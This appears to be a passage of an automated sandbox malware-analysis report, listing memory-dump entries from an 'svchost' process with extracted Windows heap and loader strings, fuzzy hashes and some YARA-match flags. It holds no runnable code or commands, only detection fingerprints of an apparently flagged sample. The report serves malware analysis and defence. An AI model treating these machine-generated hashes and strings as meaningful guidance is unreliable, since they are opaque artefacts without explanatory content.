                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                            • API String ID: 0-258546922
                                                                                            • Opcode ID: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                                            • Instruction ID: 8167ae1fbec74c7da047b3ce5bdb098d24b411ada9967fa97366f6c87b0d94de
                                                                                            • Opcode Fuzzy Hash: b0ce2ea30638340fdadfcbe1b97d5f839abe5b706f779510a39353db82819641
                                                                                            • Instruction Fuzzy Hash: 4AF13B76D00218EFCF15DF98D984AAEBBF9FF49650F15405BE902AB250D7749E01CBA0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                            • API String ID: 0-2518169356
                                                                                            • Opcode ID: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                                            • Instruction ID: 507e0aa0a03d4a5a1c344dde915725ba08941310cd5429f481a40428b6380a5b
                                                                                            • Opcode Fuzzy Hash: 41d542eff2bd4030d099f69b2eb153f925089474e372be50fdf15d409c015334
                                                                                            • Instruction Fuzzy Hash: 6991BF76D006199FCB20CFA9C881AFEB7B8EF4A710F59416AE811EB352D735D901CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1975516107
                                                                                            • Opcode ID: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                                            • Instruction ID: 29bacc90396f13a2dd5c2222613d488ca9e0229281b992e807e20ee22a74675a
                                                                                            • Opcode Fuzzy Hash: b38e976ea0c6e8cb0678a297fbe06a229d7379977adf3577e89304f1b9716c4e
                                                                                            • Instruction Fuzzy Hash: 6A51EE75A00345DFDB24EFA8C68479DFBB1BF49318F28425BE8056B6A5D774A881CB80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                            • API String ID: 0-3061284088
                                                                                            • Opcode ID: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                                            • Instruction ID: 7ec83e9d1a2cd6e4eb0ffcfb69d5360722ebd41f449ce80cfa2d314a7c9a3658
                                                                                            • Opcode Fuzzy Hash: 0e107cebf052e6cfb8a99e752ad672cb97568d2f69a4711ed8f6069d5db4ce08
                                                                                            • Instruction Fuzzy Hash: 8A01D876148660EFD22AF71DE519F96BBE4EB42B70F18405BE0104BAA2CBA59C84D570
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                                            • Instruction ID: 5c720f475052159e6a3f4be9f1f10e72eb7c28b4cfc0f7f7fac978905813a9a4
                                                                                            • Opcode Fuzzy Hash: 5a5605a92d66b8095c5b4ddb10633a8a5322f00d3f0709557a2cc598600acad1
                                                                                            • Instruction Fuzzy Hash: 69139D70A00655DFDB25CF68C4807A9FBF5BF89304F1881AED859AB381D73AA945CF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-3570731704
                                                                                            • Opcode ID: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                                            • Instruction ID: 6cafc36fdc16cf96f1734caedb69ab4e6aab6f98a775d083496654a5038cbf6a
                                                                                            • Opcode Fuzzy Hash: 1cb36fba9d1f4bec82de3208c3d52f0a6281a7d16f338364539868be9ace5bb4
                                                                                            • Instruction Fuzzy Hash: 43923875E00228CFEB25CB18C981BA9B7B5BF85314F1981EBE949AB350D7349E80CF51
                                                                                            Strings
                                                                                            • SsHd, xrefs: 03A4A885
                                                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03A97D03
                                                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03A97D56
                                                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03A97D39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                            • API String ID: 0-2905229100
                                                                                            • Opcode ID: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                                            • Instruction ID: 9e213cd229c4ac4a1af075da0219763e25527fa065368dafa9c31d95ac12252d
                                                                                            • Opcode Fuzzy Hash: d9367a8ffcf87c15cd14c72590af554d5416ad288f675ececd56713960db17fb
                                                                                            • Instruction Fuzzy Hash: 93D17C76A402199BDF24CF98C9806ADF7B5FF88310F19416BE845AB352D371D951CBA0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                                            • Instruction ID: 022eb5a9025751643c2a21e450b86c452660aa0534101605dc41ab9c792221bf
                                                                                            • Opcode Fuzzy Hash: b8d3ee56b7d18420d42213645f920625798aa944010edd581d22cdfdb8a55610
                                                                                            • Instruction Fuzzy Hash: 28E29074A00655DFDB28CF69C490BA9FBF1FF89304F1881AED849AB385D735A845CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                            • API String ID: 0-379654539
                                                                                            • Opcode ID: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                                            • Instruction ID: 584432be85fe13b77e3d5cf4e764cb4d7bb944404988cc87f2b08d69c3087c2e
                                                                                            • Opcode Fuzzy Hash: 496e732f0d58218b9c070a2a63866c1cab30399565341ce71f91cef90a6f1142
                                                                                            • Instruction Fuzzy Hash: A8C177742083969FDB11CF28C144B6AB7F4AF86704F04896FF8D69B250E739C949CB56
                                                                                            Strings
                                                                                            • HEAP[%wZ]: , xrefs: 03A954D1, 03A95592
                                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03A955AE
                                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03A954ED
                                                                                            • HEAP: , xrefs: 03A954E0, 03A955A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                            • API String ID: 0-1657114761
                                                                                            • Opcode ID: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                                            • Instruction ID: 4a064eaf1d898d18c847a18d04cc775828ad5146751f57b2763fb9dbc82507ee
                                                                                            • Opcode Fuzzy Hash: 006ef1e2a29b20a99e4d5047df1b0c5afa3263a40c3f72ea3193dff072ae5c7d
                                                                                            • Instruction Fuzzy Hash: CAA1E034A04205DFDB24DF28C845BBAFBF5AF95300F18866FD5968B782D734A844EB90
                                                                                            Strings
                                                                                            • .Local, xrefs: 03A628D8
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 03AA21DE
                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03AA21D9, 03AA22B1
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03AA22B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                            • API String ID: 0-1239276146
                                                                                            • Opcode ID: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                                            • Instruction ID: d00d9de2c67835240671e6311fa6dd06428eb94ea12ffee7cfe1f8a5815cedb7
                                                                                            • Opcode Fuzzy Hash: 89297d2bfd422c8abda2032f2ae83d2927a180f4034677c3a950d4331de27cbb
                                                                                            • Instruction Fuzzy Hash: F7A180369402299BDB24CF68DC84BA9B3B5BF58314F1949EFD848AB351D7309E84CF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                            • API String ID: 0-2586055223
                                                                                            • Opcode ID: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                                            • Instruction ID: aa296583c16daa479120f820bc5dcb9d0a36c31c6ecbe388f68d05c407762d64
                                                                                            • Opcode Fuzzy Hash: e9c0ff3c72fd4e6c746eaa3a1e8d3c732e6b67b9c0cadc108a075ed893497d1b
                                                                                            • Instruction Fuzzy Hash: 3561E076205780AFD721EB28C944F67BBF9EF84714F08086AF9558B391D734E941CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CV|$CV|$gfff$|
                                                                                            • API String ID: 0-3193153294
                                                                                            • Opcode ID: e7a5007481dda8e4a4196a522ca4ec33406c4e1c4f5740477c53a8be38a32eb0
                                                                                            • Instruction ID: a1a1deca0d2dda3937c2e99b57891cdccbf0c28398d2d5ae64b2bf8f95f011fa
                                                                                            • Opcode Fuzzy Hash: e7a5007481dda8e4a4196a522ca4ec33406c4e1c4f5740477c53a8be38a32eb0
                                                                                            • Instruction Fuzzy Hash: BC516B31F0020A47DB188D9DDE843D9BAA2EBE8304F58817BDD489F3C6D5B8AE0587D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CV|$CV|$gfff$|
                                                                                            • API String ID: 0-3193153294
                                                                                            • Opcode ID: 1d8e4784891accfd47ed13edffe62c2f0d02ad1b8d387308c423930b404b555c
                                                                                            • Instruction ID: 081c143cfaa1c4e39a8e35fea610cb1901c9dde64770691b2feaf352c2fc1d04
                                                                                            • Opcode Fuzzy Hash: 1d8e4784891accfd47ed13edffe62c2f0d02ad1b8d387308c423930b404b555c
                                                                                            • Instruction Fuzzy Hash: B5515D31F0020A47DB188D9DDE843D9BA56EBE8304F58817ADD449F3C6D5B8AE0587D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                            • API String ID: 0-336120773
                                                                                            • Opcode ID: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                                            • Instruction ID: 5640fa5e1c611e059691ae399d2b88f17617e2d2565026375bfdb02ca5201fef
                                                                                            • Opcode Fuzzy Hash: 4b0d010567552ee9ff7948e19382012f010a8f1fc6dc0d23015e9d7e45f874f2
                                                                                            • Instruction Fuzzy Hash: 6F31CB35600220EFD719EB98CD85FAAB7E8FF09764F18016BE451DB291E670EC41CA65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                            • API String ID: 0-1391187441
                                                                                            • Opcode ID: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                                            • Instruction ID: b6a9564966e3799282a2e4182c10809bb47ef469efacd18763b38071f4bfc628
                                                                                            • Opcode Fuzzy Hash: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                                            • Instruction Fuzzy Hash: D4316076A00214EFCB11EB5AC985FAFBBB9EF45B20F14405BE815AB291D770ED40CA71
                                                                                            Strings
                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03A4327D
                                                                                            • HEAP[%wZ]: , xrefs: 03A43255
                                                                                            • HEAP: , xrefs: 03A43264
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                            • API String ID: 0-617086771
                                                                                            • Opcode ID: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                                            • Instruction ID: b14979d86a1559113c921aa3d9c36d5cd517f9b81941745c007e2f4a2d3c5e5b
                                                                                            • Opcode Fuzzy Hash: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                                            • Instruction Fuzzy Hash: 2B929A74A042499FDF25CF68C5447AEBBF1EF89300F1884AEE899AB391D735A941CF50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                                            • Instruction ID: 6ea9363dd267c2726302b933c256626521b982c24f16fff8d4d22345f4f04886
                                                                                            • Opcode Fuzzy Hash: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                                            • Instruction Fuzzy Hash: A522FB70A00641AFEB26CF28C495B7AFBF5EF46704F18849BE4559B392E735E881CB50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-4253913091
                                                                                            • Opcode ID: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                                            • Instruction ID: 3347c6cf4e671669eb5ed9f59dc216b8eecbff1f1a6b9277a192a906454854d8
                                                                                            • Opcode Fuzzy Hash: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                                            • Instruction Fuzzy Hash: 36F1DE34A00605DFEB19DF68C980B6AF7F5FF85304F1881AAE516AB391D734E981CB90
                                                                                            Strings
                                                                                            • HEAP[%wZ]: , xrefs: 03A31712
                                                                                            • HEAP: , xrefs: 03A31596
                                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03A31728
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                            • API String ID: 0-3178619729
                                                                                            • Opcode ID: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                                            • Instruction ID: 610709e2ce17c858ad566b8fec25c91aa3b42083f67f7ac14f69ba074d6f8fc5
                                                                                            • Opcode Fuzzy Hash: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                                            • Instruction Fuzzy Hash: 2EE1C070A046469FDB29EF68C491B7ABBF5AF4A300F18855FF4968B345E734E940CB50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                            • API String ID: 0-1145731471
                                                                                            • Opcode ID: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                                            • Instruction ID: 1da94759f46221035dff2fa4eafc4e17346b3cece483057297a480bc1dc9850c
                                                                                            • Opcode Fuzzy Hash: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                                            • Instruction Fuzzy Hash: F8B16A79A056449FEF25CF69C980BADB7B6EF45714F1889AFE451EB380D730A840CB60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                            • API String ID: 0-2391371766
                                                                                            • Opcode ID: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                                            • Instruction ID: 23ee4bd00c63a88fc5779ea660b2770205c6327d03870154d0e23e6c51999e3b
                                                                                            • Opcode Fuzzy Hash: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                                            • Instruction Fuzzy Hash: 03B19D79604341AFEB21DF54C980BABB7FCAB49714F15092FFA409B291D771E844CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $@
                                                                                            • API String ID: 0-1077428164
                                                                                            • Opcode ID: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                                            • Instruction ID: 2c2a95ef37f5fc73e27ac2bd630dcec5057f28a74874ed75174b36e260d49be9
                                                                                            • Opcode Fuzzy Hash: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                                            • Instruction Fuzzy Hash: 05C27D716087419FEB25CF24C880BABBBE5AF88754F08896FF989E7250D735D804CB52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            • Opcode Fuzzy Hash: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                                            • Instruction Fuzzy Hash: 494153325013504AE335FF65EA84BA97BA4AB10B2CF18032EFDA18F6D9CBB54481C791
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@
                                                                                            • API String ID: 0-149943524
                                                                                            • Opcode ID: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                                            • Instruction ID: ad7057c915d896e68f9593e13577b879d61b08ddc5b21a22d9523fd04d0f494e
                                                                                            • Opcode Fuzzy Hash: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                                            • Instruction Fuzzy Hash: 113277749083118BDB28CF19C594B3AF7E5AFCA750F18492FF9959B2A0E734D844CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction ID: 43f70fa5d34d56a64a5fcdc68060a6d8f791d41cfd8d07da9d1eb43c14c6e85b
                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction Fuzzy Hash: F6C1CE312047429FD724CF68C944BABFBE5AF84358F088A2EF699CA290D779D505CF51
                                                                                            Strings
                                                                                            • Failed to retrieve service checksum., xrefs: 03A8EE56
                                                                                            • ResIdCount less than 2., xrefs: 03A8EEC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                            • API String ID: 0-863616075
                                                                                            • Opcode ID: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                                            • Instruction ID: eae62c7f7d0e92526fcc9591efc1be43e2ac25469e405032f68f141408973b1c
                                                                                            • Opcode Fuzzy Hash: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                                            • Instruction Fuzzy Hash: 49E1E1B19087849FE324CF15C441BABBBE4BB88314F008A2FE59D8B381DB749509CF56
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d$gfff
                                                                                            • API String ID: 0-1799034191
                                                                                            • Opcode ID: 7c7e3d19d4338b95fbd49e97f60348eea0abdb1dce3251b4e656174b836c1395
                                                                                            • Instruction ID: 6acde87ad6c99a728100d2cab21e4da7bca42db48d8945b2d20613de315a308f
                                                                                            • Opcode Fuzzy Hash: 7c7e3d19d4338b95fbd49e97f60348eea0abdb1dce3251b4e656174b836c1395
                                                                                            • Instruction Fuzzy Hash: 27610536B0010647CF1CCA5DCE5466AB3A6EBD4314F24827FD815EB3C1E6B9DD028688
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
